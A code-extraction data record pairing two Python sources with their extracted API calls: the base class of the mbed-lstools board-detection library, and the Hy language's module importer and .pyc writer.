return func(*args, **kwargs)
return new_func
return actual_decorator
class FSInteraction(object):
BeforeFilter = 1
AfterFilter = 2
Never = 3
class MbedLsToolsBase(object):
""" Base class for mbed-lstools, defines mbed-ls tools interface for
mbed-enabled devices detection for various hosts
"""
__metaclass__ = ABCMeta
# Which OSs are supported by this module
# Note: more than one OS can be supported by mbed-lstools_* module
os_supported = []
# Directory where we will store global (OS user specific mocking)
HOME_DIR = expanduser("~")
MOCK_FILE_NAME = '.mbedls-mock'
RETARGET_FILE_NAME = 'mbedls.json'
DETAILS_TXT_NAME = 'DETAILS.TXT'
MBED_HTM_NAME = 'mbed.htm'
VENDOR_ID_DEVICE_TYPE_MAP = {
'0483': 'stlink',
'0d28': 'daplink',
'1366': 'jlink',
'03eb': 'atmel'
}
def __init__(self, list_unmounted=False, **kwargs):
""" ctor
"""
self.retarget_data = {} # Used to retarget mbed-enabled platform properties
platform_dbs = []
if isfile(self.MOCK_FILE_NAME) or ("force_mock" in kwargs and kwargs['force_mock']):
platform_dbs.append(self.MOCK_FILE_NAME)
elif isfile(LOCAL_MOCKS_DATABASE):
platform_dbs.append(LOCAL_MOCKS_DATABASE)
platform_dbs.append(LOCAL_PLATFORM_DATABASE)
self.plat_db = PlatformDatabase(platform_dbs,
primary_database=platform_dbs[0])
self.list_unmounted = list_unmounted
if 'skip_retarget' not in kwargs or not kwargs['skip_retarget']:
self.retarget()
@abstractmethod
def find_candidates(self):
"""Find all candidate devices connected to this computer
Note: Should not open any files
@return A dict with the keys 'mount_point', 'serial_port' and 'target_id_usb_id'
"""
raise NotImplemented
@deprecated("Functionality has been moved into 'list_mbeds'. "
"Please use list_mbeds with 'unique_names=True' and "
"'read_details_txt=True'")
def list_mbeds_ext(self):
"""! Function adds extra information for each mbed device
@return Returns list of mbed devices plus extended data like 'platform_name_unique'
@details Get information about mbeds with extended parameters/info included
"""
return self.list_mbeds(unique_names=True, read_details_txt=True)
def list_mbeds(
self, fs_interaction=FSInteraction.BeforeFilter,
filter_function=None, unique_names=False,
read_details_txt=False):
""" List details of connected devices
@return Returns list of structures with detailed info about each mbed
@param fs_interaction A member of the FSInteraction class that picks the
trade of between quality of service and speed
@param filter_function Function that is passed each mbed candidate,
should return True if it should be included in the result
Ex. mbeds = list_mbeds(filter_function=lambda m: m['platform_name'] == 'K64F')
@param unique_names A boolean controlling the presence of the
'platform_unique_name' member of the output dict
@param read_details_txt A boolean controlling the presense of the
output dict attributes read from other files present on the 'mount_point'
@details Function returns list of dictionaries with mbed attributes 'mount_point', TargetID name etc.
Function returns mbed list with platform names if possible
"""
platform_count = {}
candidates = list(self.find_candidates())
logger.debug("Candidates for display %r", candidates)
result = []
for device in candidates:
device['device_type'] = self._detect_device_type(device)
if ((not device['mount_point'] or
not self.mount_point_ready(device['mount_point'])) and
not self.list_unmounted):
if (device['target_id_usb_id'] and device['serial_port']):
logger.warning(
"MBED with target id '%s' is connected, but not mounted. "
"Use the '-u' flag to include it in the list.",
device['target_id_usb_id'])
else:
platform_data = self.plat_db.get(device['target_id_usb_id'][0:4],
device_type=device['device_type'] or 'daplink', verbose_data=True)
device.update(platform_data or {"platform_name": None})
maybe_device = {
FSInteraction.BeforeFilter: self._fs_before_id_check,
FSInteraction.AfterFilter: self._fs_after_id_check,
FSInteraction.Never: self._fs_never
}[fs_interaction](device, filter_function, read_details_txt)
if maybe_device and (maybe_device['mount_point'] or self.list_unmounted):
if unique_names:
name = device['platform_name']
platform_count.setdefault(name, -1)
platform_count[name] += 1
device['platform_name_unique'] = (
"%s[%d]" % (name, platform_count[name]))
try:
device.update(self.retarget_data[device['target_id']])
logger.debug("retargeting %s with %r",
device['target_id'],
self.retarget_data[device['target_id']])
except KeyError:
pass
# This is done for API compatibility, would prefer for this to just be None
device['device_type'] = device['device_type'] if device['device_type'] else 'unknown'
result.append(maybe_device)
return result
def _fs_never(self, device, filter_function, read_details_txt):
"""Filter device without touching the file system of the device"""
device['target_id'] = device['target_id_usb_id']
device['target_id_mbed_htm'] = None
if not filter_function or filter_function(device):
return device
else:
return None
def _fs_before_id_check(self, device, filter_function, read_details_txt):
"""Filter device after touching the file system of the device.
Said another way: Touch the file system before filtering
"""
device['target_id'] = device['target_id_usb_id']
self._update_device_from_fs(device, read_details_txt)
if not filter_function or filter_function(device):
return device
else:
return None
def _fs_after_id_check(self, device, filter_function, read_details_txt):
"""Filter device before touching the file system of the device.
Said another way: Touch the file system after filtering
"""
device['target_id'] = device['target_id_usb_id']
device['target_id_mbed_htm'] = None
if not filter_function or filter_function(device):
self._update_device_from_fs(device, read_details_txt)
return device
else:
return None
def _update_device_from_fs(self, device, read_details_txt):
""" Updates the device information based on files from its 'mount_point'
@param device Dictionary containing device information
@param read_details_txt A boolean controlling the presense of the
output dict attributes read from other files present on the 'mount_point'
"""
if not device.get('mount_point', None):
return
try:
directory_entries = os.listdir(device['mount_point'])
device['directory_entries'] = directory_entries
device['target_id'] = device['target_id_usb_id']
# Always try to update using daplink compatible boards processself.
# This is done for backwards compatibility.
self._update_device_details_daplink_compatible(device, read_details_txt)
if device.get('device_type') == 'jlink':
self._update_device_details_jlink(device, read_details_txt)
if device.get('device_type') == 'atmel':
self._update_device_details_atmel(device, read_details_txt)
except (OSError, IOError) as e:
logger.warning(
'Marking device with mount point "%s" as unmounted due to the '
'following error: %s', device['mount_point'], e)
device['mount_point'] = None
def _detect_device_type(self, device):
""" Returns a string of the device type
@param device Dictionary containing device information
@return Device type located in VENDOR_ID_DEVICE_TYPE_MAP or None if unknown
"""
return self.VENDOR_ID_DEVICE_TYPE_MAP.get(device.get('vendor_id'))
def _update_device_details_daplink_compatible(self, device, read_details_txt):
""" Updates the daplink-specific device information based on files from its 'mount_point'
@param device Dictionary containing device information
@param read_details_txt A boolean controlling the presense of the
output dict attributes read from other files present on the 'mount_point'
"""
lowercase_directory_entries = [e.lower() for e in device['directory_entries']]
if self.MBED_HTM_NAME.lower() in lowercase_directory_entries:
self._update_device_from_htm(device)
elif not read_details_txt:
logger.debug('Since mbed.htm is not present, attempting to use '
'details.txt for the target id')
read_details_txt = True
if read_details_txt and self.DETAILS_TXT_NAME.lower() in lowercase_directory_entries:
details_txt = self._details_txt(device['mount_point']) or {}
device.update({"daplink_%s" % f.lower().replace(' ', '_'): v
for f, v in details_txt.items()})
# If details.txt contains the target id, this is the most trusted source
if device.get('daplink_unique_id', None):
device['target_id'] = device['daplink_unique_id']
if device['target_id']:
identifier = device['target_id'][0:4]
platform_data = self.plat_db.get(identifier,
device_type='daplink',
verbose_data=True)
if not platform_data:
logger.warning('daplink entry: "%s" not found in platform database', identifier)
else:
device.update(platform_data)
else:
device['platform_name'] = None
def _update_device_details_jlink(self, device, _):
""" Updates the jlink-specific device information based on files from its 'mount_point'
@param device Dictionary containing device information
"""
lower_case_map = {e.lower(): e for e in device['directory_entries']}
if 'board.html' in lower_case_map:
board_file_key = 'board.html'
elif 'user guide.html' in lower_case_map:
board_file_key = 'user guide.html'
else:
logger.warning('No valid file found to update JLink device details')
return
board_file_path = os.path.join(device['mount_point'], lower_case_map[board_file_key])
with open(board_file_path, 'r') as board_file:
board_file_lines = board_file.readlines()
for line in board_file_lines:
m = re.search(r'url=([\w\d\:\-/\\\?\.=-_]+)', line)
if m:
device['url'] = m.group(1).strip()
identifier = device['url'].split('/')[-1]
platform_data = self.plat_db.get(identifier,
device_type='jlink',
verbose_data=True)
if not platform_data:
logger.warning('jlink entry: "%s", not found in platform database', identifier)
else:
device.update(platform_data)
break
def _update_device_from_htm(self, device):
"""Set the 'target_id', 'target_id_mbed_htm', 'platform_name' and
'daplink_*' attributes by reading from mbed.htm on the device
"""
htm_target_id, daplink_info = self._read_htm_ids(device['mount_point'])
if daplink_info:
device.update({"daplink_%s" % f.lower().replace(' ', '_'): v
for f, v in daplink_info.items()})
if htm_target_id:
logger.debug("Found htm target id, %s, for usb target id %s",
htm_target_id, device['target_id_usb_id'])
device['target_id'] = htm_target_id
else:
logger.debug("Could not read htm on from usb id %s. "
"Falling back to usb id",
device['target_id_usb_id'])
device['target_id'] = device['target_id_usb_id']
device['target_id_mbed_htm'] = htm_target_id
def _update_device_details_atmel(self, device, _):
""" Updates the Atmel device information based on files from its 'mount_point'
@param device Dictionary containing device information
@param read_details_txt A boolean controlling the presense of the
output dict attributes read from other files present on the 'mount_point'
"""
# Atmel uses a system similar to DAPLink, but there's no details.txt with a target ID
# to identify device we can use the serial, which is ATMLXXXXYYYYYYY
# where XXXX is the board identifier.
# This can be verified by looking at readme.htm, which also uses the board ID to redirect to platform page
device['target_id'] = device['target_id_usb_id'][4:8]
platform_data = self.plat_db.get(device['target_id'],
device_type='atmel',
verbose_data=True)
device.update(platform_data or {"platform_name": None})
def mock_manufacture_id(self, mid, platform_name, oper='+'):
"""! Replace (or add if manufacture id doesn't exist) entry in self.manufacture_ids
@param oper '+' add new mock / override existing entry
'-' remove mid from mocking entry
@return Mocked structure (json format)
"""
if oper is '+':
self.plat_db.add(mid, platform_name, permanent=True)
elif oper is '-':
self.plat_db.remove(mid, permanent=True)
else:
raise ValueError("oper can only be [+-]")
@deprecated("List formatting methods are deprecated for a simpler API. "
"Please use 'list_mbeds' instead.")
def list_manufacture_ids(self):
"""! Creates list of all available mappings for target_id -> Platform
@return String with table formatted output
"""
from prettytable import PrettyTable, HEADER
columns = ['target_id_prefix', 'platform_name']
pt = PrettyTable(columns, junction_char="|", hrules=HEADER)
for col in columns:
pt.align[col] = 'l'
for target_id_prefix, platform_name in sorted(self.plat_db.items()):
pt.add_row([target_id_prefix, platform_name])
return pt.get_string()
def retarget_read(self):
"""! Load retarget data from local file
@return Curent retarget configuration (dictionary)
"""
if os.path.isfile(self.RETARGET_FILE_NAME):
logger.debug("reading retarget file %s", self.RETARGET_FILE_NAME)
try:
with open(self.RETARGET_FILE_NAME, "r", encoding="utf-8") as f:
return json.load(f)
except IOError as e:
logger.exception(e)
except ValueError as e:
logger.exception(e)
return {}
def retarget(self):
"""! Enable retargeting
@details Read data from local retarget configuration file
@return Retarget data structure read from configuration file
"""
self.retarget_data = self.retarget_read()
return self.retarget_data
def get_dummy_platform(self, platform_name):
"""! Returns simple dummy platform """
if not hasattr(self, "dummy_counter"):
self.dummy_counter = {} # platform<str>: counter<int>
if platform_name not in self.dummy_counter:
self.dummy_counter[platform_name] = 0
platform = {
"platform_name": platform_name,
"platform_name_unique": "%s[%d]"% (platform_name, self.dummy_counter[platform_name]),
"mount_point": "DUMMY",
"serial_port": "DUMMY",
"target_id": "DUMMY",
"target_id_mbed_htm": "DUMMY",
"target_id_usb_id": "DUMMY",
"daplink_version": "DUMMY"
}
self.dummy_counter[platform_name] += 1
return platform
def get_supported_platforms(self, device_type=None):
"""! Return a dictionary of supported target ids and the corresponding platform name
@param device_type Filter which device entries are returned from the platform database
@return Dictionary of { 'target_id': 'platform_name', ... }
"""
kwargs = {}
if device_type is not None:
kwargs['device_type'] = device_type
items = self.plat_db.items(**kwargs)
return {i[0]: i[1] for i in items}
@deprecated("List formatting methods are deprecated to simplify the API. "
"Please use 'list_mbeds' instead.")
def list_platforms(self):
"""! Useful if you just want to know which platforms are currently available on the system
@return List of (unique values) available platforms
"""
result = []
mbeds = self.list_mbeds()
for i, val in enumerate(mbeds):
platform_name = str(val['platform_name'])
if platform_name not in result:
result.append(platform_name)
return result
@deprecated("List formatting methods are deprecated to simplify the API. "
"Please use 'list_mbeds' instead.")
def list_platforms_ext(self):
"""! Useful if you just want to know how many platforms of each type are currently available on the system
@return Dict of platform: platform_count
"""
result = {}
mbeds = self.list_mbeds()
for i, val in enumerate(mbeds):
platform_name = str(val['platform_name'])
if platform_name not in result:
result[platform_name] = 1
else:
result[platform_name] += 1
return result
@deprecated("List formatting methods are deprecated to simplify the API. "
"Please use 'list_mbeds' instead.")
def list_mbeds_by_targetid(self):
"""! Get information about mbeds with extended parameters/info included
@return Returns dictionary where keys are TargetIDs and values are mbed structures
@details Ordered by target id (key: target_id).
"""
result = {}
mbed_list = self.list_mbeds_ext()
for mbed in mbed_list:
target_id = mbed['target_id']
result[target_id] = mbed
return result
def __str__(self):
"""! Object to string casting
@return Stringified class object should be prettytable formated string
"""
return self.get_string()
@deprecated("List formatting methods are deprecated to simplify the API. "
"Please use 'list_mbeds' instead.")
def get_string(self, border=False, header=True, padding_width=1, sortby='platform_name'):
"""! Printing with some sql table like decorators
@param border Table border visibility
@param header Table header visibility
@param padding_width Table padding
@param sortby Column used to sort results
@return Returns string which can be printed on console
"""
from prettytable import PrettyTable, HEADER
result = ''
mbeds = self.list_mbeds(unique_names=True, read_details_txt=True)
if mbeds:
""" ['platform_name', 'mount_point', 'serial_port', 'target_id'] - columns generated from USB auto-detection
['platform_name_unique', ...] - columns generated outside detection subsystem (OS dependent detection)
"""
columns = ['platform_name', 'platform_name_unique', 'mount_point', 'serial_port', 'target_id', 'daplink_version']
pt = PrettyTable(columns, junction_char="|", hrules=HEADER)
for col in columns:
pt.align[col] = 'l'
for mbed in mbeds:
row = []
for col in columns:
row.append(mbed[col] if col in mbed and mbed[col] else 'unknown')
pt.add_row(row)
result = pt.get_string(border=border, header=header, padding_width=padding_width, sortby=sortby)
return result
# Private functions supporting API
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def get_json_data_from_file(self, json_spec_filename, verbose=False):
"""! Loads from file JSON formatted string to data structure
@return None if JSON can be loaded
"""
try:
with open(json_spec_filename) as data_file:
try:
return json.load(data_file)
except ValueError as json_error_msg:
logger.error("Parsing file(%s): %s", json_spec_filename, json_error_msg)
return None
except IOError as fileopen_error_msg:
logger.warning(fileopen_error_msg)
return None
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def get_htm_target_id(self, mount_point):
target_id, _ = self._read_htm_ids(mount_point)
return target_id
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def get_mbed_htm(self, mount_point):
_, build_info = self._read_htm_ids(mount_point)
return build_info
def _read_htm_ids(self, mount_point):
"""! Function scans mbed.htm to get information about TargetID.
@param mount_point mbed mount point (disk / drive letter)
@return Function returns targetID, in case of failure returns None.
@details Note: This function should be improved to scan variety of boards' mbed.htm files
"""
result = {}
target_id = None
for line in self._htm_lines(mount_point):
target_id = target_id or self._target_id_from_htm(line)
ver_bld = self._mbed_htm_comment_section_ver_build(line)
if ver_bld:
result['version'], result['build'] = ver_bld
m = re.search(r'url=([\w\d\:/\\\?\.=-_]+)', line)
if m:
result['url'] = m.group(1).strip()
return target_id, result
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def get_mbed_htm_comment_section_ver_build(self, line):
return self._mbed_htm_comment_section_ver_build(line)
def _mbed_htm_comment_section_ver_build(self, line):
"""! Check for Version and Build date of interface chip firmware im mbed.htm file
@return (version, build) tuple if successful, None if no info found
"""
# <!-- Version: 0200 Build: Mar 26 2014 13:22:20 -->
m = re.search(r'^<!-- Version: (\d+) Build: ([\d\w: ]+) -->', line)
if m:
version_str, build_str = m.groups()
return (version_str.strip(), build_str.strip())
# <!-- Version: 0219 Build: Feb 2 2016 15:20:54 Git Commit SHA: 0853ba0cdeae2436c52efcba0ba76a6434c200ff Git local mods:No-->
m = re.search(r'^<!-- Version: (\d+) Build: ([\d\w: ]+) Git Commit SHA', line)
if m:
version_str, build_str = m.groups()
return (version_str.strip(), build_str.strip())
# <!-- Version: 0.14.3. build 471 -->
m = re.search(r'^<!-- Version: ([\d+\.]+)\. build (\d+) -->', line)
if m:
version_str, build_str = m.groups()
return (version_str.strip(), build_str.strip())
return None
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def get_mbed_htm_lines(self, mount_point):
return self._htm_lines(mount_point)
def _htm_lines(self, mount_point):
if mount_point:
mbed_htm_path = join(mount_point, self.MBED_HTM_NAME)
with open(mbed_htm_path, 'r') as f:
return f.readlines()
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def get_details_txt(self, mount_point):
return self._details_txt(mount_point)
def _details_txt(self, mount_point):
"""! Load DETAILS.TXT to dictionary:
DETAILS.TXT example:
Version: 0226
Build: Aug 24 2015 17:06:30
Git Commit SHA: 27a236b9fe39c674a703c5c89655fbd26b8e27e1
Git Local mods: Yes
or:
# DAPLink Firmware - see https://mbed.com/daplink
Unique ID: 0240000029164e45002f0012706e0006f301000097969900
HIF ID: 97969900
Auto Reset: 0
Automation allowed: 0
Daplink Mode: Interface
Interface Version: 0240
Git SHA: c765cbb590f57598756683254ca38b211693ae5e
Local Mods: 0
USB Interfaces: MSD, CDC, HID
Interface CRC: 0x26764ebf
"""
if mount_point:
path_to_details_txt = os.path.join(mount_point, self.DETAILS_TXT_NAME)
with open(path_to_details_txt, 'r') as f:
return self._parse_details(f.readlines())
return None
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def parse_details_txt(self, lines):
return self._parse_details(lines)
def _parse_details(self, lines):
result = {}
for line in lines:
if not line.startswith('#'):
key, _, value = line.partition(':')
if value:
result[key] = value.strip()
if 'Interface Version' in result:
result['Version'] = result['Interface Version']
return result
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def scan_html_line_for_target_id(self, line):
return self._target_id_from_htm(line)
def _target_id_from_htm(self, line):
"""! Extract Target id from htm line.
@return Target id or None
"""
# Detecting modern mbed.htm file format
m = re.search('\?code=([a-fA-F0-9]+)', line)
if m:
result = m.groups()[0]
logger.debug("Found target id %s in htm line %s", result, line)
return result
# Last resort, we can try to see if old mbed.htm format is there
m = re.search('\?auth=([a-fA-F0-9]+)', line)
if m:
result = m.groups()[0]
logger.debug("Found target id %s in htm line %s", result, line)
return result
return None
def mount_point_ready(self, path):
"""! Check if a mount point is ready for file operations
"""
return exists(path) and isdir(path)
@staticmethod
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def run_cli_process(cmd, shell=True):
return MbedLsToolsBase._run_cli_process(cmd, shell)
@staticmethod
def _run_cli_process(cmd, shell=True):
"""! Runs command as a process and return stdout, stderr and ret code
@param cmd Command to execute
@return Tuple of (stdout, stderr, returncode)
"""
from subprocess import Popen, PIPE
p = Popen(cmd, shell=shell, stdout=PIPE, stderr=PIPE)
_stdout, _stderr = p.communicate()
return _stdout, _stderr, p.returncode
| [
"logging.getLogger",
"logging.NullHandler",
"prettytable.PrettyTable",
"os.listdir",
"os.path.exists",
"subprocess.Popen",
"os.path.join",
"functools.wraps",
"io.open",
"os.path.isfile",
"os.path.isdir",
"json.load",
"os.path.expanduser",
"re.search"
] | [((939, 966), 'logging.getLogger', 'logging.getLogger', (['"""mbedls"""'], {}), "('mbedls')\n", (956, 966), False, 'import logging\n'), ((1022, 1062), 'logging.getLogger', 'logging.getLogger', (['"""mbedls.lstools_base"""'], {}), "('mbedls.lstools_base')\n", (1039, 1062), False, 'import logging\n'), ((1081, 1102), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (1100, 1102), False, 'import logging\n'), ((1996, 2011), 'os.path.expanduser', 'expanduser', (['"""~"""'], {}), "('~')\n", (2006, 2011), False, 'from os.path import expanduser\n'), ((1225, 1246), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (1240, 1246), False, 'import functools\n'), ((13014, 13081), 'os.path.join', 'os.path.join', (["device['mount_point']", 'lower_case_map[board_file_key]'], {}), "(device['mount_point'], lower_case_map[board_file_key])\n", (13026, 13081), False, 'import os\n'), ((16840, 16894), 'prettytable.PrettyTable', 'PrettyTable', (['columns'], {'junction_char': '"""|"""', 'hrules': 'HEADER'}), "(columns, junction_char='|', hrules=HEADER)\n", (16851, 16894), False, 'from prettytable import PrettyTable, HEADER\n'), ((17283, 17322), 'os.path.isfile', 'os.path.isfile', (['self.RETARGET_FILE_NAME'], {}), '(self.RETARGET_FILE_NAME)\n', (17297, 17322), False, 'import os\n'), ((25585, 25650), 're.search', 're.search', (['"""^<!-- Version: (\\\\d+) Build: ([\\\\d\\\\w: ]+) -->"""', 'line'], {}), "('^<!-- Version: (\\\\d+) Build: ([\\\\d\\\\w: ]+) -->', line)\n", (25594, 25650), False, 'import re\n'), ((25919, 25995), 're.search', 're.search', (['"""^<!-- Version: (\\\\d+) Build: ([\\\\d\\\\w: ]+) Git Commit SHA"""', 'line'], {}), "('^<!-- Version: (\\\\d+) Build: ([\\\\d\\\\w: ]+) Git Commit SHA', line)\n", (25928, 25995), False, 'import re\n'), ((26175, 26241), 're.search', 're.search', (['"""^<!-- Version: ([\\\\d+\\\\.]+)\\\\. build (\\\\d+) -->"""', 'line'], {}), "('^<!-- Version: ([\\\\d+\\\\.]+)\\\\. build (\\\\d+) -->', line)\n", (26184, 26241), False, 'import re\n'), ((29027, 29068), 're.search', 're.search', (['"""\\\\?code=([a-fA-F0-9]+)"""', 'line'], {}), "('\\\\?code=([a-fA-F0-9]+)', line)\n", (29036, 29068), False, 'import re\n'), ((29304, 29345), 're.search', 're.search', (['"""\\\\?auth=([a-fA-F0-9]+)"""', 'line'], {}), "('\\\\?auth=([a-fA-F0-9]+)', line)\n", (29313, 29345), False, 'import re\n'), ((30218, 30267), 'subprocess.Popen', 'Popen', (['cmd'], {'shell': 'shell', 'stdout': 'PIPE', 'stderr': 'PIPE'}), '(cmd, shell=shell, stdout=PIPE, stderr=PIPE)\n', (30223, 30267), False, 'from subprocess import Popen, PIPE\n'), ((2515, 2542), 'os.path.isfile', 'isfile', (['self.MOCK_FILE_NAME'], {}), '(self.MOCK_FILE_NAME)\n', (2521, 2542), False, 'from os.path import isfile, join, exists, isdir\n'), ((2663, 2691), 'os.path.isfile', 'isfile', (['LOCAL_MOCKS_DATABASE'], {}), '(LOCAL_MOCKS_DATABASE)\n', (2669, 2691), False, 'from os.path import isfile, join, exists, isdir\n'), ((9283, 9316), 'os.listdir', 'os.listdir', (["device['mount_point']"], {}), "(device['mount_point'])\n", (9293, 9316), False, 'import os\n'), ((13095, 13121), 'io.open', 'open', (['board_file_path', '"""r"""'], {}), "(board_file_path, 'r')\n", (13099, 13121), False, 'from io import open\n'), ((13246, 13300), 're.search', 're.search', (['"""url=([\\\\w\\\\d\\\\:\\\\-/\\\\\\\\\\\\?\\\\.=-_]+)"""', 'line'], {}), "('url=([\\\\w\\\\d\\\\:\\\\-/\\\\\\\\\\\\?\\\\.=-_]+)', line)\n", (13255, 13300), False, 'import re\n'), ((22440, 22494), 'prettytable.PrettyTable', 'PrettyTable', (['columns'], {'junction_char': '"""|"""', 'hrules': 'HEADER'}), "(columns, junction_char='|', hrules=HEADER)\n", (22451, 22494), False, 'from prettytable import PrettyTable, HEADER\n'), ((24886, 24937), 're.search', 're.search', (['"""url=([\\\\w\\\\d\\\\:/\\\\\\\\\\\\?\\\\.=-_]+)"""', 'line'], {}), "('url=([\\\\w\\\\d\\\\:/\\\\\\\\\\\\?\\\\.=-_]+)', line)\n", (24895, 24937), False, 'import re\n'), ((26684, 26721), 'os.path.join', 'join', (['mount_point', 'self.MBED_HTM_NAME'], {}), '(mount_point, self.MBED_HTM_NAME)\n', (26688, 26721), False, 'from os.path import isfile, join, exists, isdir\n'), ((27858, 27906), 'os.path.join', 'os.path.join', (['mount_point', 'self.DETAILS_TXT_NAME'], {}), '(mount_point, self.DETAILS_TXT_NAME)\n', (27870, 27906), False, 'import os\n'), ((29649, 29661), 'os.path.exists', 'exists', (['path'], {}), '(path)\n', (29655, 29661), False, 'from os.path import isfile, join, exists, isdir\n'), ((29666, 29677), 'os.path.isdir', 'isdir', (['path'], {}), '(path)\n', (29671, 29677), False, 'from os.path import isfile, join, exists, isdir\n'), ((23293, 23317), 'io.open', 'open', (['json_spec_filename'], {}), '(json_spec_filename)\n', (23297, 23317), False, 'from io import open\n'), ((26739, 26763), 'io.open', 'open', (['mbed_htm_path', '"""r"""'], {}), "(mbed_htm_path, 'r')\n", (26743, 26763), False, 'from io import open\n'), ((27924, 27954), 'io.open', 'open', (['path_to_details_txt', '"""r"""'], {}), "(path_to_details_txt, 'r')\n", (27928, 27954), False, 'from io import open\n'), ((17440, 17492), 'io.open', 'open', (['self.RETARGET_FILE_NAME', '"""r"""'], {'encoding': '"""utf-8"""'}), "(self.RETARGET_FILE_NAME, 'r', encoding='utf-8')\n", (17444, 17492), False, 'from io import open\n'), ((17526, 17538), 'json.load', 'json.load', (['f'], {}), '(f)\n', (17535, 17538), False, 'import json\n'), ((23380, 23400), 'json.load', 'json.load', (['data_file'], {}), '(data_file)\n', (23389, 23400), False, 'import json\n')] |
# Copyright (c) 2013 <NAME> <<EMAIL>>
# Copyright (c) 2013, 2014 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from hy.compiler import hy_compile, HyTypeError
from hy.models import HyObject, replace_hy_obj
from hy.lex import tokenize, LexException
from hy.errors import HyIOError
from io import open
import marshal
import imp
import sys
import ast
import os
import __future__
from hy._compat import PY3, PY33, MAGIC, builtins, long_type, wr_long
def ast_compile(ast, filename, mode):
"""Compile AST.
Like Python's compile, but with some special flags."""
flags = (__future__.CO_FUTURE_DIVISION |
__future__.CO_FUTURE_PRINT_FUNCTION)
return compile(ast, filename, mode, flags)
def import_buffer_to_hst(buf):
"""Import content from buf and return an Hy AST."""
return tokenize(buf + "\n")
def import_file_to_hst(fpath):
"""Import content from fpath and return an Hy AST."""
try:
with open(fpath, 'r', encoding='utf-8') as f:
return import_buffer_to_hst(f.read())
except IOError as e:
raise HyIOError(e.errno, e.strerror, e.filename)
def import_buffer_to_ast(buf, module_name):
""" Import content from buf and return a Python AST."""
return hy_compile(import_buffer_to_hst(buf), module_name)
def import_file_to_ast(fpath, module_name):
"""Import content from fpath and return a Python AST."""
return hy_compile(import_file_to_hst(fpath), module_name)
def import_file_to_module(module_name, fpath):
"""Import content from fpath and puts it into a Python module.
Returns the module."""
try:
_ast = import_file_to_ast(fpath, module_name)
mod = imp.new_module(module_name)
mod.__file__ = fpath
eval(ast_compile(_ast, fpath, "exec"), mod.__dict__)
except (HyTypeError, LexException) as e:
if e.source is None:
with open(fpath, 'rt') as fp:
e.source = fp.read()
e.filename = fpath
raise
except Exception:
sys.modules.pop(module_name, None)
raise
return mod
def import_buffer_to_module(module_name, buf):
try:
_ast = import_buffer_to_ast(buf, module_name)
mod = imp.new_module(module_name)
eval(ast_compile(_ast, "", "exec"), mod.__dict__)
except (HyTypeError, LexException) as e:
if e.source is None:
e.source = buf
e.filename = '<stdin>'
raise
return mod
def hy_eval(hytree, namespace, module_name):
foo = HyObject()
foo.start_line = 0
foo.end_line = 0
foo.start_column = 0
foo.end_column = 0
replace_hy_obj(hytree, foo)
_ast, expr = hy_compile(hytree, module_name, get_expr=True)
# Spoof the positions in the generated ast...
for node in ast.walk(_ast):
node.lineno = 1
node.col_offset = 1
for node in ast.walk(expr):
node.lineno = 1
node.col_offset = 1
# Two-step eval: eval() the body of the exec call
eval(ast_compile(_ast, "<eval_body>", "exec"), namespace)
# Then eval the expression context and return that
return eval(ast_compile(expr, "<eval>", "eval"), namespace)
def write_hy_as_pyc(fname):
with open(fname, 'U') as f:
try:
st = os.fstat(f.fileno())
except AttributeError:
st = os.stat(fname)
timestamp = long_type(st.st_mtime)
_ast = import_file_to_ast(fname,
os.path.basename(os.path.splitext(fname)[0]))
code = ast_compile(_ast, fname, "exec")
cfile = "%s.pyc" % fname[:-len(".hy")]
open_ = builtins.open
with open_(cfile, 'wb') as fc:
if PY3:
fc.write(b'\0\0\0\0')
else:
fc.write('\0\0\0\0')
wr_long(fc, timestamp)
if PY33:
wr_long(fc, st.st_size)
marshal.dump(code, fc)
fc.flush()
fc.seek(0, 0)
fc.write(MAGIC)
class MetaLoader(object):
def __init__(self, path):
self.path = path
def is_package(self, fullname):
dirpath = "/".join(fullname.split("."))
for pth in sys.path:
pth = os.path.abspath(pth)
composed_path = "%s/%s/__init__.hy" % (pth, dirpath)
if os.path.exists(composed_path):
return True
return False
def load_module(self, fullname):
if fullname in sys.modules:
return sys.modules[fullname]
if not self.path:
return
sys.modules[fullname] = None
mod = import_file_to_module(fullname,
self.path)
ispkg = self.is_package(fullname)
mod.__file__ = self.path
mod.__loader__ = self
mod.__name__ = fullname
if ispkg:
mod.__path__ = []
mod.__package__ = fullname
else:
mod.__package__ = fullname.rpartition('.')[0]
sys.modules[fullname] = mod
return mod
class MetaImporter(object):
def find_on_path(self, fullname):
fls = ["%s/__init__.hy", "%s.hy"]
dirpath = "/".join(fullname.split("."))
for pth in sys.path:
pth = os.path.abspath(pth)
for fp in fls:
composed_path = fp % ("%s/%s" % (pth, dirpath))
if os.path.exists(composed_path):
return composed_path
def find_module(self, fullname, path=None):
path = self.find_on_path(fullname)
if path:
return MetaLoader(path)
sys.meta_path.insert(0, MetaImporter())
sys.path.insert(0, "")
| [
"os.path.exists",
